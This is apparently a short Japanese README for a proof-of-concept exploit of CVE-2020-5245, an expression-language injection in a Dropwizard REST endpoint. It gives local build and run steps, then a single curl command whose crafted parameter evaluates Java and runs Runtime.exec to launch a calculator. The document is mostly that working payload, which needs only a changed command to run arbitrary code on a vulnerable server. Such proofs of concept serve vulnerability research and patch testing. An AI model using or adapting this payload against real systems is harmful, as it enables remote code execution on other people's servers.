
CVE-2020-5245 の概念実証エクスプロイト。Dropwizard REST エンドポイントにおける式言語インジェクションを、細工された HTTP パラメータを介して実証します。
mvn clean install を実行してくださいjava -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml を実行してくださいhttp://localhost:8080 にアクセスしてくださいpom.xml のエラーはプラグインに影響せず、再現されました

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}